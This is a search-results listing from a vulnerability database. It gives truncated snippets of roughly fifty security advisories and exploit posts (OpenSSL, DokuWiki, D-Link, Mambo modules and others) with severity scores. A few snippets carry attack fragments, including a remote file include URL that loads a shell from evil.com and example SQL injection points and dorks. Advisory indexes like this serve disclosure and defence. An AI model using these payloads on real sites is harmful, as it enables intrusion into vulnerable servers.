Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2015/05/12 12:0 a.m.129 views

[ MDVSA-2015:185 ] dokuwiki

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:185 http://www.mandriva.com/en/support/security/ Package : dokuwiki Date : March 31, 2015 Affected: Business Server 1.0 Problem Description: Updated dokuwiki packages fix security vulnerabilities:...

6.5CVSS6.6AI score0.02882EPSS
Exploits0
securityvulns
securityvulns
added 2015/03/21 12:0 a.m.129 views

Security Audit Notes: OpenSSL d1_srvr.c Overflow - Advanced Information Security

-= Advanced Information Security Corporation =- ------------------------------------------------------------------------ Author: Nicholas Lemonias Type: Security Audit Notes Date: 17/3/2015 Email: lem.nikolas at gmail dot com Audit: OpenSSL v1.0.2 22nd of January, 2015 Release...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2014/10/15 12:0 a.m.129 views

[USN-2383-1] wpa_supplicant vulnerability

========================================================================== Ubuntu Security Notice USN-2383-1 October 14, 2014 wpa, wpasupplicant vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...

6.8CVSS0.3AI score0.04945EPSS
Exploits0
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.129 views

CVE-2014-1222 - Local File Inclusion in Vtiger CRM

Vulnerability title: Local File Inclusion in Vtiger CRM CVE: CVE-2014-1222 Vendor: Vtiger Product: CRM Affected version: Vtiger CRM 5.4.0, 6.0 RC & 6.0.0 GA Fixed version: Vtiger CRM 6.0.0 Security patch 1 Reported by: Jerzy Kramarz Details: A local file inclusion vulnerability was discovered in...

4CVSS0.1AI score0.08795EPSS
Exploits10
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.129 views

Remote Code Execution in Microweber

Advisory ID: HTB23175 Product: Microweber Vendor: Microweber Vulnerable Versions: 0.8 and probably prior Tested Version: 0.8 Advisory Publication: September 25, 2013 without technical details Vendor Notification: September 25, 2013 Vendor Patch: September 26, 2013 Public Disclosure: October 16,...

6.4CVSS0.3AI score0.02823EPSS
Exploits2
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.129 views

SKIDATA RFID Freemotion.Gate Unauthenticated Web Service Aribtrary Remote Command Execution

Title: SKIDATA RFID Freemotion.Gate Unauthenticated Web Service Aribtrary Remote Command Execution Product: Freemotion.Gate Vendor: SKIDATA, http://www.skidata.com/en/ RTP|One, http://http://www.rtp.com/ Vulnerable Versions: 4.1.3.5 and likely all prior versions. Tested Version: 4.1.3.5 Original...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2013/09/09 12:0 a.m.129 views

CS, XSS and FPD vulnerabilities in MCImageManager for TinyMCE

Hello 3APA3A! I want to warn you about vulnerabilities in Moxiecode Image Manager MCImageManager. This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle. These are Content Spoofing, Cross-Site Scripting and Full Path...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2012/08/13 12:0 a.m.129 views

[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities

Title: Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities Affected Software: http://www.openconstructor.org/ http://code.google.com/p/openconstructor/downloads/list http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 Description: Openconstructor...

6.5CVSS0.4AI score0.0092EPSS
Exploits6
securityvulns
securityvulns
added 2012/04/23 12:0 a.m.129 views

FastPath Webchat | Multiple Cross Site Scripting Vulnerabilities

OVERVIEW Fastpath WebChat is vulnerable to Cross Site Scripting. 2. BACKGROUND Fastpath WebChat is part of the Fastpath product. It provides a way for users to begin chatting with support agents using Fastpath. Fastpath is a plugin of OpenFire, a real time collaboration RTC server for instant...

Exploits0
securityvulns
securityvulns
added 2012/02/14 12:0 a.m.129 views

D-Link DIR-601 TFTP Directory Traversal Vulnerability

Vulnerability title: D-Link DIR-601 TFTP Directory Traversal Vulnerability CVSS Risk Rating: 7.8 High Product: D-Link DIR-601 Wireless N 150 Home Router Application Vendor: D-Link Vendor URL: www.dlink.com Public disclosure date: 1/20/2012 Discovered by: Rob Kraus and Solutionary Engineering...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2011/10/15 12:0 a.m.129 views

APPLE-SA-2011-10-12-4 Safari 5.1.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-4 Safari 5.1.1 Safari 5.1.1 is now available and addresses the following: Safari Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.2, OS X Lion Server v10.7.2, Windows 7, Vista, XP SP2 or later Impact:...

9.3CVSS9.6AI score0.50213EPSS
Exploits15
securityvulns
securityvulns
added 2011/08/27 12:0 a.m.129 views

OMNITEC (prodotto.php?id_prodotto) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability OMNITEC prodotto.php?idprodotto AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Persian Gulf 4 Ever! Dork : "design e realizzazione by OMNITEC" Exploite:...

4.2AI score
Exploits0
securityvulns
securityvulns
added 2011/08/10 12:0 a.m.129 views

[security bulletin] HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02942411 Version: 1 HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access NOTICE: The information in this Security Bulletin should be acted up...

6.4CVSS0.8AI score0.02519EPSS
Exploits0
securityvulns
securityvulns
added 2011/06/27 12:0 a.m.129 views

XSS и AoF уязвимости в Drupal

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting и Abuse of Functionality уязвимостях в Drupal. XSS WASC-08: При добавлении или изменении данных в любых внутренних формах добавление/изменение поста и т.д. можно провести persistent XSS атаку. XSS код выполнится при посещении...

5.8AI score
Exploits0
securityvulns
securityvulns
added 2011/06/10 12:0 a.m.129 views

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2011/05/08 12:0 a.m.129 views

HTB22970: Multiple XSS vulnerabilities in PHPDug

Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...

Exploits0
securityvulns
securityvulns
added 2010/12/14 12:0 a.m.129 views

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD bug discovered & exploited by Kingcope Dec 2010 Lame Xploit Tested with success on FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2010/12/12 12:0 a.m.129 views

www.eVuln.com : Non-persistent XSS in slickMsg

www.eVuln.com advisory: Non-persistent XSS in slickMsg Summary: http://evuln.com/vulns/159/summary.html Details: http://evuln.com/vulns/159/description.html -----------Summary----------- eVuln ID: EV0159 Software: slickMsg Version: 0.7-alpha Critical Level: low Type: Cross Site Scripting Status:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2009/11/17 12:0 a.m.129 views

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html =============Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation================ Authors: Giuseppe 'Evilcry' Bonfa' AbdulAziz Hariri E-Mail: evilcry AT GMAIL DOT COM Website: http://evilcry.netsons.org...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2009/09/28 12:0 a.m.129 views

[ONSEC-09-012] UMI.CMS Hash based Captcha

ONSEC-09-012 UMI.CMS Hash based Captcha Цель: UMI CMS =2.7.3 Тип: Обход ограничений Угроза: Средняя Дата обнаружения: 15.07.2009 Дата оповещения разработчика: 15.07.2009 Дата выхода исправления: 03.09.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group onsec dot ru Описание: В модуле...

Exploits0
securityvulns
securityvulns
added 2009/06/16 12:0 a.m.129 views

Netgear DG632 Router Authentication Bypass Vulnerability

Product Name: Netgear DG632 Router Vendor: http://www.netgear.com Date: 15 June, 2009 Author: [email protected] [email protected] Original URL: http://www.tomneaves.co.uk/NetgearDG632AuthenticationBypass.txt Discovered: 18 November, 2006 Disclosed: 15 June, 2009 I. DESCRIPTION The Netgear DG6...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2009/04/17 12:0 a.m.129 views

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

?php / Geeklog = 1.5.2 savepreferences/blocks remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480: ... if isset...

7.6AI score
Exploits0
securityvulns
securityvulns
added 2009/04/10 12:0 a.m.129 views

Adgregate ShopAd widget validation is vulnerable to replay attack

Adgregate is a "TechCrunch 50" startup that recently signed a distribution deal with Google/DoubleClick 1. As a service, they offer a "viral widget" intended to be hosted on untrusted third-party sites through which consumers can enter their credit card information. According to their website, th...

1AI score
Exploits0
securityvulns
securityvulns
added 2009/01/15 12:0 a.m.129 views

US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/06/25 12:0 a.m.129 views

Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities Advisory ID: cisco-sa-20080625-cucm Revision 1.0 For Public Release 2008 June 25 1600 UTC GMT...

7.8CVSS0.6AI score0.02454EPSS
Exploits2
securityvulns
securityvulns
added 2008/05/20 12:0 a.m.129 views

Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

========================================================== Starsgames Control Panel = 4.6.2 Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 19 May 2008 SITE : www.citec.us APPLICATION : Starsgames Control Panel VERSION : = 4.6.2...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2007/11/29 12:0 a.m.129 views

Liferay Enterprise Portal multiple XSS

Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2007/06/19 12:0 a.m.129 views

fusetalk SQL (autherror.cfm)

Hello everyone, After trying to report bugs to FuseTalk, and seeing them providing patches to customers dropping new fixed .cfm files in a private place reserved to customers without giving proper credits and without reporting them publicly we were following the Full Disclosure Policy v2.0, we...

8.1AI score
Exploits0
securityvulns
securityvulns
added 2007/04/11 12:0 a.m.129 views

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/11/28 12:0 a.m.129 views

tar archiver directory traversal

Problem with outdated GNUTYPENAMES structure parsing allow to create symbolic links outside target directory...

3.9AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/11/09 12:0 a.m.129 views

LetterIt v2 (inc/session.php) Remote File Include Vulnerability

================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2006/10/11 12:0 a.m.129 views

7 php scripts File Inclusion / Source disclosure Vuln

Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2006/09/14 12:0 a.m.129 views

[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities

====================================================================== Secunia Research 14/09/2006 - Tagger LE PHP "eval" Injection Vulnerabilities - ====================================================================== Table of Contents Affected...

7.5CVSS0.6AI score0.08205EPSS
Exploits1
securityvulns
securityvulns
added 2006/09/12 12:0 a.m.129 views

Popper <= v1.41 (form) Remote File Inclusion Exploit

============================================================================================== Popper = v1.41 form Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2006/09/04 12:0 a.m.129 views

OpenLDAP privilege escalation

User with 'selfwrite' ACL parameter can modify any attributes...

3.8AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/08/21 12:0 a.m.129 views

mambo-phphop Product Scroller Module R.F.I

Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp Software: mambo-phphop Product Scroller Module Attack method: Remote File Inclusion Source: / Load the phpshop main parse code / requireonce...

2.3AI score
Exploits0
securityvulns
securityvulns
added 2006/07/24 12:0 a.m.129 views

VBZooM "sendmail.php" SQL Injection

=========================================== Discovered By: C.B.B.L CrAzY CrAcKeR ,Breeeeh ,BoNy-m ,LiNuXrOOt =========================================== Example:- /sendmail.php?UserID=SQL Injection ===========================================...

2.2AI score
Exploits0
securityvulns
securityvulns
added 2005/02/04 12:0 a.m.129 views

[SIG^2 G-TEC] DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities

SIG^2 Vulnerability Research Advisory DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities by Tan Chew Keong Release Date: 02 Feb 2005 ADVISORY URL http://www.security.org.sg/vuln/desknow2512.html SUMMARY DeskNow Mail and Collaboration Server...

7.9AI score
Exploits0
securityvulns
securityvulns
added 2001/06/23 12:0 a.m.129 views

Vulnerability in AIX diagrpt

This file contains security alerts published by the IBM Emergency Response Service. These alerts are published at the following URL on the world-wide web: http://www.ers.ibm.com/ In order to keep the size of this file reasonable, it contains only advisories for the current year. You can obtain a...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2015/10/26 12:0 a.m.128 views

CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 = version 6.30.0 Affected JIRA product versions: 6.3.5 = version 6.4.11...

6.5CVSS0.4AI score0.59312EPSS
Exploits7
securityvulns
securityvulns
added 2014/05/29 12:0 a.m.128 views

[SECURITY] [DSA 2937-1] mod-wsgi security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2937-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq -...

6.2CVSS1.7AI score0.08526EPSS
Exploits0
securityvulns
securityvulns
added 2014/04/08 12:0 a.m.128 views

OpenSSH protection bypass

SSHFP protection bypass for client...

5.8CVSS1.9AI score0.01988EPSS
Exploits1References1Affected Software1
securityvulns
securityvulns
added 2013/10/13 12:0 a.m.128 views

[ISecAuditors Security Advisories] Multiple Vulnerabilities in Uebimiau <= 2.7.11

============================================= INTERNET SECURITY AUDITORS ALERT 2013-008 - Original release date: March 15th, 2013 - Last revised: March 20th, 2013 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 CVSS Base Score - CVE-ID: CVE-2013-2621, CVE-2013-2622, CVE-2013-2623...

0.8AI score0.10692EPSS
Exploits6
securityvulns
securityvulns
added 2013/08/12 12:0 a.m.128 views

Multiple vulnerabilities on D-Link DIR-645 devices

Multiple vulnerabilities on D-Link DIR-645 devices ================================================== ADVISORY INFORMATION Title: Multiple vulnerabilities on D-Link DIR-645 devices Discovery date: 06/03/2013 Release date: 02/08/2013 Advisory URL:...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2013/02/18 12:0 a.m.128 views

[USN-1722-1] jQuery vulnerability

========================================================================== Ubuntu Security Notice USN-1722-1 February 13, 2013 jquery vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

4.3CVSS0.2AI score0.19191EPSS
Exploits1
securityvulns
securityvulns
added 2012/09/03 12:0 a.m.128 views

Cross-Site Scripting (XSS) in Jease

Advisory ID: HTB23104 Product: Jease Vendor: jease.org Vulnerable Versions: 2.8 and probably prior Tested Version: 2.8 Vendor Notification: July 25, 2012 Public Disclosure: August 15, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-4052 CVSSv2 Base Score: 4.3...

4.3CVSS6.5AI score0.01148EPSS
Exploits0
securityvulns
securityvulns
added 2012/06/03 12:0 a.m.128 views

Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access

OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2012/02/03 12:0 a.m.128 views

[Announce] Apache HTTP Server 2.2.22 Released

Apache HTTP Server 2.2.22 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.22 of the Apache HTTP Server "Apache". This version of Apache is principally a security and bug fix release, including the following significant...

5CVSS0.90734EPSS
Exploits23
securityvulns
securityvulns
added 2012/01/21 12:0 a.m.128 views

[PT-2011-01] Cross-Site Scripting in Kayako Support Suite

------------------------------------------------------------------ PT-2011-01 Positive Technologies Security Advisory Cross-Site Scripting in Kayako Support Suite ------------------------------------------------------------------ --- Vulnerable software Kayako Support Suite Version: 3.70.02-stabl...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2012/01/09 12:0 a.m.128 views

Multiple vulnerabilities in ImpressCMS

Vulnerability ID: HTB23064 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinimpresscms.html Product: ImpressCMS Vendor: The ImpressCMS Project http://www.impresscms.org/ Vulnerable Version: 1.3 Final and probably prior Tested Version: 1.3 Final Vendor Notification: 14 December...

6.7AI score
Exploits0
Total number of security vulnerabilities5000